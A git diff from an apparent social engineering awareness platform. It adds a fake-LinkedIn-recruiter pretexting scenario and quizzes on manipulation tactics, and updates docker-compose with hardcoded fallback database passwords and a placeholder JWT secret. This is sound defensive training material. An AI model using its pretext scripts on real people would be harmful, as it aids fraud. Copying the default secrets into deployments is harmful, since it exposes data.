b/data/sample/2025-01-17-insider-recon.yaml @@ -0,0 +1,174 @@ +type: challenge +title: "The Conference Contact" +description: "Someone from a recent conference reaches out to connect. But they're gathering intelligence on your company." +difficulty: medium +cialdini_categories: + - liking + - reciprocity + - social_proof +estimated_time: 12 +metadata: + author: "Pretexta" + tags: [reconnaissance, pretexting, osint, linkedin, social-engineering] + +nodes: + - id: start + type: message + channel: linkedin + content_en: + sender: "Jordan Mitchell โ€” Senior Analyst, CyberDefend Corp" + message: "Hey! We met briefly at the CyberSec Summit last week โ€” you were at the Zero Trust panel, right? I loved your question about micro-segmentation. Small world! I'd love to connect and maybe pick your brain about how your team handles identity governance. We're revamping our approach and your org always comes up as a reference." + content_id: + sender: "Jordan Mitchell โ€” Analis Senior, CyberDefend Corp" + message: "Hei! Kita bertemu singkat di CyberSec Summit minggu lalu โ€” kamu di panel Zero Trust, kan? Saya suka pertanyaan kamu tentang micro-segmentation. Dunia kecil! Saya ingin terhubung dan mungkin diskusi tentang bagaimana tim kamu menangani identity governance." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "A LinkedIn connection request from someone who claims to have met you at a conference. They're flattering and want to discuss your team's security practices. What do you do?" + content_id: + text: "Permintaan koneksi LinkedIn dari seseorang yang mengaku bertemu di konferensi. Mereka memuji dan ingin mendiskusikan praktik keamanan timmu. Apa yang kamu lakukan?" + options: + - text: "Accept and share details about your security stack โ€” networking is important" + text_id: "Terima dan bagikan detail tentang stack keamanan โ€” networking itu penting" + next: bad_outcome_overshare + score_impact: -30 + - text: "Accept the connection but keep responses vague and professional" + text_id: "Terima koneksi tapi jaga respons tetap samar dan profesional" + next: vague_response + score_impact: 10 + - text: "Check their profile thoroughly before responding" + text_id: "Cek profil mereka dengan teliti sebelum merespons" + next: check_profile + score_impact: 20 + - text: "Decline โ€” you don't remember meeting them" + text_id: "Tolak โ€” kamu tidak ingat bertemu mereka" + next: good_outcome_decline + score_impact: 15 + + - id: vague_response + type: message + channel: linkedin + content_en: + sender: "Jordan Mitchell" + message: "Totally understand keeping things high-level! Hey, completely unrelated โ€” are you guys still using CrowdStrike or did you migrate to SentinelOne? A buddy at your company mentioned something about a migration but I wasn't sure. Also, is your CISO still that ex-NSA person? They gave a great talk at BlackHat. Would love an intro if possible!" + content_id: + sender: "Jordan Mitchell" + message: "Sangat mengerti menjaga hal-hal tetap umum! Hei, sama sekali tidak terkait โ€” kalian masih pakai CrowdStrike atau sudah migrasi ke SentinelOne? Teman di perusahaan kamu menyebutkan sesuatu tentang migrasi. Juga, CISO kamu masih orang ex-NSA itu? Mereka memberikan talk hebat di BlackHat." + next: choice_escalation + + - id: choice_escalation + type: question + content_en: + text: "Jordan is now asking specific questions about your security tools, organizational structure, and wants introductions to executives. This is escalating from networking to intelligence gathering. What do you do?" + content_id: + text: "Jordan sekarang menanyakan pertanyaan spesifik tentang alat keamanan, struktur organisasi, dan ingin diperkenalkan ke eksekutif. Ini meningkat dari networking ke pengumpulan intelijen. Apa yang kamu lakukan?" + options: + - text: "Answer their questions โ€” they seem well-connected in the industry" + text_id: "Jawab pertanyaan mereka โ€” mereka tampak memiliki koneksi baik di industri" + next: bad_outcome_intel + score_impact: -40 + - text: "Recognize this as social engineering reconnaissance and report to your security team" + text_id: "Kenali ini sebagai pengintaian social engineering dan laporkan ke tim keamanan" + next: good_outcome_reported + score_impact: 35 + - text: "Stop engaging and block the contact" + text_id: "Berhenti berinteraksi dan blokir kontak" + next: good_outcome_block + score_impact: 20 + + - id: check_profile + type: message + channel: narrator + content_en: + text: "You examine Jordan's LinkedIn profile. 347 connections, but only 12 mutual. Their profile was created 2 months ago. Job history shows 3 companies in the last year. No posts or articles. Their profile photo appears in a reverse image search on a stock photo website. 'CyberDefend Corp' has no website or other employees on LinkedIn." + content_id: + text: "Kamu memeriksa profil LinkedIn Jordan. 347 koneksi, tapi hanya 12 mutual. Profil dibuat 2 bulan lalu. Riwayat pekerjaan menunjukkan 3 perusahaan dalam setahun terakhir. Tidak ada postingan. Foto profil muncul di pencarian gambar terbalik di website foto stok. 'CyberDefend Corp' tidak punya website." + next: choice_profile + + - id: choice_profile + type: question + content_en: + text: "The profile has multiple red flags: new account, stock photo, fake company. This appears to be a social engineering front. What do you do?" + content_id: + text: "Profil memiliki beberapa tanda bahaya: akun baru, foto stok, perusahaan palsu. Ini tampaknya front social engineering. Apa yang kamu lakukan?" + options: + - text: "Report the fake profile and alert your security team" + text_id: "Laporkan profil palsu dan peringatkan tim keamanan" + next: good_outcome_osint + score_impact: 40 + - text: "Ignore and move on" + text_id: "Abaikan dan lanjutkan" + next: ignore_outcome + score_impact: 10 + + - id: bad_outcome_overshare + type: end + result: failure + content_en: + title: "Compromised โ€” Intelligence Gathered" + explanation: "You shared details about your security tools, team structure, and processes with a social engineering operative. This information will be used to craft targeted attacks against your organization โ€” knowing your security stack helps attackers design evasion techniques. Never share specific security tool names, team structures, or processes with unverified contacts." + content_id: + title: "Terkompromi โ€” Intelijen Terkumpul" + explanation: "Kamu membagikan detail tentang alat keamanan, struktur tim, dan proses dengan operatif social engineering. Informasi ini akan digunakan untuk membuat serangan terarah." + + - id: bad_outcome_intel + type: end + result: failure + content_en: + title: "Compromised โ€” Full Reconnaissance Complete" + explanation: "The attacker now has your security vendor names, CISO identity, and organizational structure. This is a textbook pre-attack reconnaissance operation. The information gathered will be used for: spear-phishing your CISO, crafting payloads that evade your specific security tools, and social engineering other employees using your name as a reference." + content_id: + title: "Terkompromi โ€” Pengintaian Penuh Selesai" + explanation: "Penyerang sekarang memiliki nama vendor keamanan, identitas CISO, dan struktur organisasi. Ini adalah operasi pengintaian pra-serangan." + + - id: ignore_outcome + type: end + result: success + content_en: + title: "Safe โ€” But Report Would Help" + explanation: "You avoided the trap, but reporting the fake profile to LinkedIn and your security team would help protect other colleagues who might receive similar requests." + content_id: + title: "Aman โ€” Tapi Melaporkan Akan Membantu" + explanation: "Kamu menghindari jebakan, tapi melaporkan profil palsu ke LinkedIn dan tim keamanan akan membantu melindungi rekan lain." + + - id: good_outcome_decline + type: end + result: success + content_en: + title: "Defended โ€” Trusted Your Instinct" + explanation: "Not remembering someone who claims to have met you is a valid reason to decline. Social engineers count on politeness overriding caution. It's perfectly acceptable to not accept connection requests from people you can't verify." + content_id: + title: "Berhasil Bertahan โ€” Percaya Insting" + explanation: "Tidak mengingat seseorang yang mengaku bertemu adalah alasan valid untuk menolak. Social engineer mengandalkan kesopanan mengatasi kewaspadaan." + + - id: good_outcome_reported + type: end + result: success + content_en: + title: "Defended โ€” Pattern Recognition" + explanation: "You recognized the escalation pattern: flattery โ†’ rapport โ†’ specific technical questions โ†’ executive introductions. This is a classic social engineering kill chain for reconnaissance. Your report helped the security team identify a broader campaign targeting multiple employees." + content_id: + title: "Berhasil Bertahan โ€” Pengenalan Pola" + explanation: "Kamu mengenali pola eskalasi: pujian โ†’ rapport โ†’ pertanyaan teknis spesifik โ†’ perkenalan eksekutif. Ini adalah kill chain social engineering klasik untuk pengintaian." + + - id: good_outcome_block + type: end + result: success + content_en: + title: "Defended โ€” Disengaged" + explanation: "Good decision to stop engaging once the questions became too specific. Blocking prevents further contact attempts. Consider also reporting to your security team so they can check if other employees received similar requests." + content_id: + title: "Berhasil Bertahan โ€” Pemutusan Kontak" + explanation: "Keputusan bagus untuk berhenti berinteraksi setelah pertanyaan menjadi terlalu spesifik." + + - id: good_outcome_osint + type: end + result: success + content_en: + title: "Defended โ€” OSINT Investigation" + explanation: "Outstanding investigative skills. You used open-source intelligence techniques to uncover a fake persona: stock photo, new account, fictitious company. Your report to both LinkedIn and your security team helped take down the fake profile and alerted the security community about the campaign." + content_id: + title: "Berhasil Bertahan โ€” Investigasi OSINT" + explanation: "Keterampilan investigatif luar biasa. Kamu menggunakan teknik open-source intelligence untuk mengungkap persona palsu: foto stok, akun baru, perusahaan fiktif." diff --git a/data/sample/quiz-04-advanced-threats.yaml b/data/sample/quiz-04-advanced-threats.yaml new file mode 100644 index 0000000..9dd6aa0 --- /dev/null +++ b/data/sample/quiz-04-advanced-threats.yaml @@ -0,0 +1,188 @@ +type: quiz +title: "Advanced Social Engineering Threats" +description: "Test your knowledge of modern AI-powered attacks, deepfakes, and sophisticated social engineering techniques." +difficulty: hard +cialdini_categories: + - authority + - urgency + - social_proof +metadata: + author: "Pretexta" + tags: [deepfake, ai-attack, mfa, quishing, advanced] + +questions: + - id: q1 + content_en: + text: "What is 'MFA fatigue' attack?" + explanation: "MFA fatigue involves bombarding a user with repeated push notifications until they approve one out of frustration or to make the notifications stop. This has been used in high-profile breaches at companies like Uber and Cisco." + content_id: + text: "Apa itu serangan 'MFA fatigue'?" + explanation: "MFA fatigue melibatkan pemboman pengguna dengan notifikasi push berulang sampai mereka menyetujui satu karena frustrasi." + options: + - text: "Flooding a target with MFA push notifications until they approve one" + text_id: "Membanjiri target dengan notifikasi push MFA sampai mereka menyetujui satu" + correct: true + - text: "Brute-forcing MFA codes" + text_id: "Brute-force kode MFA" + correct: false + - text: "Disabling MFA through an admin panel" + text_id: "Menonaktifkan MFA melalui panel admin" + correct: false + - text: "Intercepting MFA tokens via man-in-the-middle" + text_id: "Mencegat token MFA via man-in-the-middle" + correct: false + points: 15 + + - id: q2 + content_en: + text: "How much audio does an AI voice cloning system typically need to create a convincing clone?" + explanation: "Modern AI voice cloning (tools like ElevenLabs, Resemble.AI) can create convincing voice clones from as little as 3-10 seconds of audio, often sourced from social media videos, voicemails, or podcast appearances." + content_id: + text: "Berapa banyak audio yang biasanya dibutuhkan sistem kloning suara AI untuk membuat klon yang meyakinkan?" + explanation: "Kloning suara AI modern dapat membuat klon suara meyakinkan dari audio sesingkat 3-10 detik." + options: + - text: "At least 1 hour of recordings" + text_id: "Minimal 1 jam rekaman" + correct: false + - text: "30 minutes of clean audio" + text_id: "30 menit audio bersih" + correct: false + - text: "As little as 3-10 seconds" + text_id: "Sesingkat 3-10 detik" + correct: true + - text: "At least 5 minutes" + text_id: "Minimal 5 menit" + correct: false + points: 20 + + - id: q3 + content_en: + text: "What is 'quishing'?" + explanation: "Quishing (QR phishing) uses malicious QR codes to redirect victims to credential-harvesting or malware-downloading websites. It's growing because QR codes bypass email security filters and are difficult to inspect before scanning." + content_id: + text: "Apa itu 'quishing'?" + explanation: "Quishing (QR phishing) menggunakan kode QR berbahaya untuk mengarahkan korban ke website pencurian kredensial atau pengunduhan malware." + options: + - text: "Phishing through quiz websites" + text_id: "Phishing melalui website kuis" + correct: false + - text: "Phishing using malicious QR codes" + text_id: "Phishing menggunakan kode QR berbahaya" + correct: true + - text: "Quick phishing campaigns that last under an hour" + text_id: "Kampanye phishing cepat yang berlangsung kurang dari satu jam" + correct: false + - text: "Phishing that targets executives (queens/kings of the company)" + text_id: "Phishing yang menargetkan eksekutif" + correct: false + points: 10 + + - id: q4 + content_en: + text: "In a deepfake video call, which is the MOST reliable way to verify the caller's identity?" + explanation: "Out-of-band verification โ€” contacting the person through a completely different, trusted channel that YOU initiate โ€” is the gold standard. Deepfakes can replicate visual appearance, voice, and even mannerisms, but they cannot simultaneously compromise a separate communication channel." + content_id: + text: "Dalam video call deepfake, mana cara PALING andal untuk memverifikasi identitas penelepon?" + explanation: "Verifikasi out-of-band โ€” menghubungi orang melalui channel berbeda dan terpercaya yang KAMU inisiasi โ€” adalah standar emas." + options: + - text: "Ask them to show their employee badge on camera" + text_id: "Minta mereka menunjukkan badge karyawan di kamera" + correct: false + - text: "Verify through a separate, trusted communication channel you initiate" + text_id: "Verifikasi melalui channel komunikasi terpisah dan terpercaya yang kamu inisiasi" + correct: true + - text: "Ask them personal questions about recent meetings" + text_id: "Ajukan pertanyaan pribadi tentang rapat terbaru" + correct: false + - text: "Check if their background matches their usual office" + text_id: "Cek apakah background mereka cocok dengan kantor biasanya" + correct: false + points: 20 + + - id: q5 + content_en: + text: "What is the 'pretexting reconnaissance' kill chain?" + explanation: "Social engineering reconnaissance follows a predictable pattern: build rapport through flattery and shared interests, then gradually escalate to specific questions about tools, people, and processes. Each step feels natural but collectively maps the organization's attack surface." + content_id: + text: "Apa itu kill chain 'pengintaian pretexting'?" + explanation: "Pengintaian social engineering mengikuti pola yang dapat diprediksi: membangun rapport melalui pujian, lalu bertahap meningkat ke pertanyaan spesifik." + options: + - text: "Malware โ†’ Exploitation โ†’ Exfiltration โ†’ Cover tracks" + text_id: "Malware โ†’ Eksploitasi โ†’ Eksfiltrasi โ†’ Tutup jejak" + correct: false + - text: "Scan โ†’ Enumerate โ†’ Exploit โ†’ Privilege escalation" + text_id: "Scan โ†’ Enumerasi โ†’ Eksploitasi โ†’ Eskalasi privilege" + correct: false + - text: "Flattery โ†’ Rapport โ†’ Specific questions โ†’ Executive access" + text_id: "Pujian โ†’ Rapport โ†’ Pertanyaan spesifik โ†’ Akses eksekutif" + correct: true + - text: "Phishing โ†’ Credential theft โ†’ Lateral movement โ†’ Data exfiltration" + text_id: "Phishing โ†’ Pencurian kredensial โ†’ Pergerakan lateral โ†’ Eksfiltrasi data" + correct: false + points: 15 + + - id: q6 + content_en: + text: "If someone claiming to be from IT calls you during an MFA bombing attack, what should you do?" + explanation: "Legitimate IT security will never call you and ask you to approve MFA pushes. Always hang up and contact IT through official channels you find independently. The caller may be the attacker coordinating the social engineering component of the MFA fatigue attack." + content_id: + text: "Jika seseorang yang mengaku dari IT meneleponmu selama serangan MFA bombing, apa yang harus kamu lakukan?" + explanation: "Keamanan IT yang sah tidak akan pernah menelepon dan meminta kamu menyetujui push MFA. Selalu tutup telepon dan hubungi IT melalui channel resmi." + options: + - text: "Follow their instructions to secure your account" + text_id: "Ikuti instruksi mereka untuk mengamankan akun" + correct: false + - text: "Approve the next push as they suggest" + text_id: "Setujui push berikutnya seperti yang mereka sarankan" + correct: false + - text: "Hang up and call IT through official channels you find independently" + text_id: "Tutup telepon dan hubungi IT melalui channel resmi yang kamu temukan sendiri" + correct: true + - text: "Ask for their employee ID to verify" + text_id: "Minta ID karyawan mereka untuk verifikasi" + correct: false + points: 20 + + - id: q7 + content_en: + text: "What is the best defense against AI voice cloning scams targeting family members?" + explanation: "A pre-established family code word that only real family members know is the most reliable defense. AI can clone voice and emotional patterns, but cannot know a secret word that was agreed upon in person. This is a simple, effective countermeasure recommended by security experts." + content_id: + text: "Apa pertahanan terbaik terhadap penipuan kloning suara AI yang menargetkan anggota keluarga?" + explanation: "Kata sandi keluarga yang telah ditetapkan sebelumnya yang hanya diketahui anggota keluarga asli adalah pertahanan paling andal." + options: + - text: "Never answer calls from unknown numbers" + text_id: "Jangan pernah menjawab panggilan dari nomor tidak dikenal" + correct: false + - text: "Establish a family code word for emergencies" + text_id: "Tetapkan kata sandi keluarga untuk keadaan darurat" + correct: true + - text: "Ask them to video call instead" + text_id: "Minta mereka video call" + correct: false + - text: "Install a voice verification app" + text_id: "Instal aplikasi verifikasi suara" + correct: false + points: 15 + + - id: q8 + content_en: + text: "Which red flag is MOST indicative of a fake LinkedIn profile used for reconnaissance?" + explanation: "A reverse image search revealing the profile photo is a stock photo is the most definitive indicator of a fake profile. Other red flags (new accounts, few posts) could apply to real people, but a stock photo proves intentional deception." + content_id: + text: "Tanda bahaya mana yang PALING menunjukkan profil LinkedIn palsu yang digunakan untuk pengintaian?" + explanation: "Pencarian gambar terbalik yang mengungkap foto profil adalah foto stok adalah indikator paling definitif dari profil palsu." + options: + - text: "Profile created recently with few connections" + text_id: "Profil dibuat baru-baru ini dengan sedikit koneksi" + correct: false + - text: "No posts or articles shared" + text_id: "Tidak ada postingan atau artikel yang dibagikan" + correct: false + - text: "Profile photo found on stock photo websites via reverse image search" + text_id: "Foto profil ditemukan di website foto stok via pencarian gambar terbalik" + correct: true + - text: "Multiple job changes in a short period" + text_id: "Beberapa pergantian pekerjaan dalam waktu singkat" + correct: false + points: 15 diff --git a/data/sample/quiz-05-cialdini-mastery.yaml b/data/sample/quiz-05-cialdini-mastery.yaml new file mode 100644 index 0000000..0bf67ed --- /dev/null +++ b/data/sample/quiz-05-cialdini-mastery.yaml @@ -0,0 +1,170 @@ +type: quiz +title: "Cialdini Principles Mastery" +description: "Can you identify which psychological principles attackers are exploiting? Advanced quiz on Cialdini's 6 Principles of Influence." +difficulty: medium +cialdini_categories: + - authority + - urgency + - scarcity + - reciprocity + - liking + - social_proof + - commitment +metadata: + author: "Pretexta" + tags: [cialdini, psychology, principles, advanced] + +questions: + - id: q1 + content_en: + text: "An attacker says: 'I already helped you bypass that firewall issue last week, remember? Now I just need a small favor...' Which principle is being exploited?" + explanation: "Reciprocity: the attacker creates a sense of obligation by claiming to have done a favor first. People feel compelled to return favors, even when the original 'favor' may have been unsolicited or fabricated." + content_id: + text: "Penyerang berkata: 'Saya sudah membantu kamu melewati masalah firewall minggu lalu, ingat? Sekarang saya hanya butuh bantuan kecil...' Prinsip mana yang dieksploitasi?" + explanation: "Reciprocity: penyerang menciptakan rasa kewajiban dengan mengklaim telah memberikan bantuan terlebih dahulu." + options: + - text: "Authority" + text_id: "Otoritas" + correct: false + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: true + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: false + - text: "Scarcity" + text_id: "Kelangkaan" + correct: false + points: 10 + + - id: q2 + content_en: + text: "'Everyone on the team already shared their passwords for the security audit. You're the last one.' Which principle?" + explanation: "Social Proof: by claiming that everyone else has already complied, the attacker leverages the human tendency to follow the behavior of others, especially peers in the same group." + content_id: + text: "'Semua orang di tim sudah membagikan password mereka untuk audit keamanan. Kamu yang terakhir.' Prinsip mana?" + explanation: "Social Proof: dengan mengklaim semua orang sudah mematuhi, penyerang memanfaatkan kecenderungan manusia untuk mengikuti perilaku orang lain." + options: + - text: "Commitment" + text_id: "Komitmen" + correct: false + - text: "Liking" + text_id: "Ketertarikan" + correct: false + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: true + - text: "Authority" + text_id: "Otoritas" + correct: false + points: 10 + + - id: q3 + content_en: + text: "'You agreed to help with Phase 1, so naturally we assumed you'd continue to Phase 2 which requires admin access.' Which principle?" + explanation: "Commitment & Consistency: once someone has agreed to a small request, they feel psychologically compelled to stay consistent with that commitment, even when the follow-up request is much larger (foot-in-the-door technique)." + content_id: + text: "'Kamu sudah setuju membantu Fase 1, jadi kami berasumsi kamu akan melanjutkan ke Fase 2 yang memerlukan akses admin.' Prinsip mana?" + explanation: "Komitmen & Konsistensi: setelah seseorang setuju pada permintaan kecil, mereka merasa terdorong untuk tetap konsisten." + options: + - text: "Commitment & Consistency" + text_id: "Komitmen & Konsistensi" + correct: true + - text: "Authority" + text_id: "Otoritas" + correct: false + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: false + - text: "Urgency" + text_id: "Urgensi" + correct: false + points: 15 + + - id: q4 + content_en: + text: "'This offer expires in 15 minutes. After that, the price doubles and we can't guarantee availability.' Which TWO principles are at play?" + explanation: "Scarcity (limited availability, time constraint) combined with Urgency (must act NOW). These two principles are frequently paired because they both create fear of missing out (FOMO) and bypass rational deliberation." + content_id: + text: "'Penawaran ini berakhir dalam 15 menit. Setelah itu, harga dua kali lipat dan kami tidak bisa menjamin ketersediaan.' DUA prinsip mana yang berlaku?" + explanation: "Kelangkaan (ketersediaan terbatas) dikombinasikan dengan Urgensi (harus bertindak SEKARANG)." + options: + - text: "Authority and Liking" + text_id: "Otoritas dan Ketertarikan" + correct: false + - text: "Social Proof and Commitment" + text_id: "Bukti Sosial dan Komitmen" + correct: false + - text: "Scarcity and Urgency" + text_id: "Kelangkaan dan Urgensi" + correct: true + - text: "Reciprocity and Social Proof" + text_id: "Timbal Balik dan Bukti Sosial" + correct: false + points: 15 + + - id: q5 + content_en: + text: "An attacker researches your hobbies, favorite sports team, and alma mater before contact. During conversation they mention shared interests. Which principle?" + explanation: "Liking: people are more likely to comply with requests from people they like. By mirroring interests, shared backgrounds, and complimenting the target, attackers build artificial rapport that lowers the target's guard." + content_id: + text: "Penyerang meneliti hobi, tim olahraga favorit, dan almamater kamu sebelum menghubungi. Selama percakapan mereka menyebutkan minat bersama. Prinsip mana?" + explanation: "Liking: orang lebih cenderung mematuhi permintaan dari orang yang mereka sukai." + options: + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: false + - text: "Liking" + text_id: "Ketertarikan" + correct: true + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: false + - text: "Commitment" + text_id: "Komitmen" + correct: false + points: 10 + + - id: q6 + content_en: + text: "Which combination of Cialdini principles makes CEO fraud (BEC) so effective?" + explanation: "CEO fraud combines Authority (impersonating a C-level executive) with Urgency (must act now, confidential) and often Commitment (you've always been reliable). This combination attacks from multiple psychological angles simultaneously." + content_id: + text: "Kombinasi prinsip Cialdini mana yang membuat CEO fraud (BEC) sangat efektif?" + explanation: "CEO fraud menggabungkan Otoritas dengan Urgensi dan sering Komitmen." + options: + - text: "Liking + Reciprocity + Social Proof" + text_id: "Ketertarikan + Timbal Balik + Bukti Sosial" + correct: false + - text: "Authority + Urgency + Commitment" + text_id: "Otoritas + Urgensi + Komitmen" + correct: true + - text: "Scarcity + Social Proof + Liking" + text_id: "Kelangkaan + Bukti Sosial + Ketertarikan" + correct: false + - text: "Reciprocity + Authority + Scarcity" + text_id: "Timbal Balik + Otoritas + Kelangkaan" + correct: false + points: 20 + + - id: q7 + content_en: + text: "What is the 'foot-in-the-door' technique?" + explanation: "The foot-in-the-door technique exploits Commitment & Consistency. By getting someone to agree to a small, harmless request first, the attacker can later escalate to larger requests because people want to remain consistent with their prior behavior." + content_id: + text: "Apa itu teknik 'foot-in-the-door'?" + explanation: "Teknik foot-in-the-door mengeksploitasi Komitmen & Konsistensi." + options: + - text: "Physically blocking a door to tailgate into a building" + text_id: "Secara fisik memblokir pintu untuk masuk ke gedung" + correct: false + - text: "Starting with a small request to build toward a larger one" + text_id: "Memulai dengan permintaan kecil untuk membangun ke yang lebih besar" + correct: true + - text: "Using a USB drive left at an office door" + text_id: "Menggunakan USB drive yang ditinggalkan di depan pintu kantor" + correct: false + - text: "Impersonating a delivery person to gain building access" + text_id: "Menyamar sebagai kurir untuk mendapatkan akses gedung" + correct: false + points: 10 diff --git a/docker-compose.yml b/docker-compose.yml index 3ac7c90..1cb032c 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,21 +1,25 @@ -version: '3.8' - services: mongodb: image: mongo:7.0 container_name: soceng_mongodb restart: unless-stopped environment: - MONGO_INITDB_ROOT_USERNAME: soceng_admin - MONGO_INITDB_ROOT_PASSWORD: soceng_secure_password_2025 - MONGO_INITDB_DATABASE: Pretexta + MONGO_INITDB_ROOT_USERNAME: ${MONGO_USERNAME:-soceng_admin} + MONGO_INITDB_ROOT_PASSWORD: ${MONGO_PASSWORD:-soceng_secure_password_2025} + MONGO_INITDB_DATABASE: ${DB_NAME:-Pretexta} volumes: - mongodb_data:/data/db - ./docker/mongo-init.js:/docker-entrypoint-initdb.d/mongo-init.js:ro ports: - - "27017:27017" + - "${MONGO_PORT:-47017}:27017" networks: - soceng_network + healthcheck: + test: ["CMD", "mongosh", "--eval", "db.adminCommand('ping')"] + interval: 10s + timeout: 5s + retries: 5 + start_period: 30s backend: build: @@ -24,40 +28,54 @@ services: container_name: soceng_backend restart: unless-stopped environment: - MONGO_URL: mongodb://soceng_admin:soceng_secure_password_2025@mongodb:27017/Pretexta?authSource=admin - DB_NAME: Pretexta + MONGO_URL: mongodb://${MONGO_USERNAME:-soceng_admin}:${MONGO_PASSWORD:-soceng_secure_password_2025}@mongodb:27017/${DB_NAME:-Pretexta}?authSource=admin + DB_NAME: ${DB_NAME:-Pretexta} JWT_SECRET: ${JWT_SECRET:-change-this-secret-key-in-production} - CORS_ORIGINS: http://localhost:3000,http://localhost:80 + CORS_ORIGINS: ${CORS_ORIGINS:-http://localhost:${FRONTEND_PORT:-9443},http://localhost:80} volumes: - ./backend:/app - ./data:/app/data - ./bin:/app/bin ports: - - "8001:8001" + - "${BACKEND_PORT:-9442}:8001" depends_on: - - mongodb + mongodb: + condition: service_healthy networks: - soceng_network + healthcheck: + test: ["CMD", "python", "-c", "import urllib.request; urllib.request.urlopen('http://localhost:8001/api/health')"] + interval: 10s + timeout: 5s + retries: 5 + start_period: 15s command: uvicorn server:app --host 0.0.0.0 --port 8001 --reload frontend: build: context: . dockerfile: Dockerfile.frontend + args: + REACT_APP_BACKEND_URL: ${REACT_APP_BACKEND_URL:-http://localhost:9442} container_name: soceng_frontend restart: unless-stopped - environment: - REACT_APP_BACKEND_URL: http://localhost:8001 ports: - - "3000:3000" + - "${FRONTEND_PORT:-9443}:3000" depends_on: - - backend + backend: + condition: service_healthy networks: - soceng_network + healthcheck: + test: ["CMD", "wget", "--no-verbose", "--tries=1", "--spider", "http://localhost:3000/"] + interval: 10s + timeout: 5s + retries: 3 + start_period: 10s volumes: mongodb_data: driver: local networks: - soceng_network: \ No newline at end of file + soceng_network: diff --git a/frontend/public/index.html b/frontend/public/index.html index 7bb4ea8..dd36858 100644 --- a/frontend/public/index.html +++ b/frontend/public/index.html @@ -1,28 +1,19 @@ - + + + Pretexta | Human Defense Lab
- - - \ No newline at end of file + diff --git a/frontend/public/manifest.json b/frontend/public/manifest.json new file mode 100644 index 0000000..7624b3d --- /dev/null +++ b/frontend/public/manifest.json @@ -0,0 +1,22 @@ +{ + "short_name": "Pretexta", + "name": "Pretexta - Social Engineering Lab", + "description": "Learn to defend against social engineering attacks through interactive simulations", + "icons": [ + { + "src": "icon-192.png", + "sizes": "192x192", + "type": "image/png" + }, + { + "src": "icon-512.png", + "sizes": "512x512", + "type": "image/png" + } + ], + "start_url": ".", + "display": "standalone", + "theme_color": "#000000", + "background_color": "#000000", + "orientation": "portrait-primary" +} diff --git a/frontend/src/App.js b/frontend/src/App.js index aea93d4..0811c77 100644 --- a/frontend/src/App.js +++ b/frontend/src/App.js @@ -1,45 +1,64 @@ -import React, { useEffect, useState } from 'react'; +import React, { useEffect, useState, lazy, Suspense } from 'react'; import { BrowserRouter, Routes, Route, Navigate } from 'react-router-dom'; import { Toaster } from 'sonner'; import './i18n/config'; import './App.css'; -// Pages +// Eagerly loaded (always needed) import LoginPage from './pages/LoginPage'; -import ProfilePage from './pages/ProfilePage'; -import GlossaryPage from './pages/GlossaryPage'; // New Feature -import DashboardPage from './pages/DashboardPage'; -import ScenariosPage from './pages/ScenariosPage'; -import QuizzesPage from './pages/QuizzesPage'; -import SimulationsPage from './pages/SimulationsPage'; -import SettingsPage from './pages/SettingsPage'; -import InstallerPage from './pages/InstallerPage'; -import SimulationPlayerPage from './pages/SimulationPlayerPage'; -import AIChatPage from './pages/AIChatPage'; -import QuizPlayerPage from './pages/QuizPlayerPage'; - -// Layout +import RegisterPage from './pages/RegisterPage'; import Layout from './components/Layout'; -import ProtectedRoute from './components/ProtectedRoute'; // Added for new routes +import ProtectedRoute from './components/ProtectedRoute'; +import ErrorBoundary from './components/ErrorBoundary'; + +// Lazy loaded pages +const DashboardPage = lazy(() => import('./pages/DashboardPage')); +const ScenariosPage = lazy(() => import('./pages/ScenariosPage')); +const QuizzesPage = lazy(() => import('./pages/QuizzesPage')); +const QuizPlayerPage = lazy(() => import('./pages/QuizPlayerPage')); +const SimulationsPage = lazy(() => import('./pages/SimulationsPage')); +const SimulationPlayerPage = lazy(() => import('./pages/SimulationPlayerPage')); +const AIChatPage = lazy(() => import('./pages/AIChatPage')); +const SettingsPage = lazy(() => import('./pages/SettingsPage')); +const InstallerPage = lazy(() => import('./pages/InstallerPage')); +const ProfilePage = lazy(() => import('./pages/ProfilePage')); +const GlossaryPage = lazy(() => import('./pages/GlossaryPage')); +const LeaderboardPage = lazy(() => import('./pages/LeaderboardPage')); +const AnalyticsPage = lazy(() => import('./pages/AnalyticsPage')); +const CampaignsPage = lazy(() => import('./pages/CampaignsPage')); +const ScenarioBuilderPage = lazy(() => import('./pages/ScenarioBuilderPage')); +const DebriefPage = lazy(() => import('./pages/DebriefPage')); +const CertificatePage = lazy(() => import('./pages/CertificatePage')); + +function PageLoader() { + return ( +
+
LOADING...
+
+ ); +} function App() { const [isAuthenticated, setIsAuthenticated] = useState(false); const [isLoading, setIsLoading] = useState(true); const [firstRunCompleted, setFirstRunCompleted] = useState(true); + const [showRegister, setShowRegister] = useState(false); useEffect(() => { - // Check for auth token const token = localStorage.getItem('soceng_token'); if (token) { setIsAuthenticated(true); } - // Check first run status - skip if already has token (for testing/production) const firstRun = localStorage.getItem('soceng_first_run'); if (!firstRun && !token) { setFirstRunCompleted(false); } + // Apply saved theme + const savedTheme = localStorage.getItem('soceng_theme') || 'dark'; + document.documentElement.classList.toggle('light', savedTheme === 'light'); + setIsLoading(false); }, []); @@ -53,45 +72,71 @@ function App() { if (!firstRunCompleted) { return ( - - - { - setFirstRunCompleted(true); - localStorage.setItem('soceng_first_run', 'true'); - }} /> - + + + + }> + { + setFirstRunCompleted(true); + localStorage.setItem('soceng_first_run', 'true'); + }} /> + + + ); } if (!isAuthenticated) { return ( - - - setIsAuthenticated(true)} /> - + + + + {showRegister ? ( + setIsAuthenticated(true)} + onSwitchToLogin={() => setShowRegister(false)} + /> + ) : ( + setIsAuthenticated(true)} + onSwitchToRegister={() => setShowRegister(true)} + /> + )} + + ); } return ( - - - setIsAuthenticated(false)}> - - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - } /> - - - + + + + setIsAuthenticated(false)}> + }> + + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + } /> + + + + + ); } -export default App; \ No newline at end of file +export default App; diff --git a/frontend/src/components/EmailRenderer.js b/frontend/src/components/EmailRenderer.js new file mode 100644 index 0000000..94857a6 --- 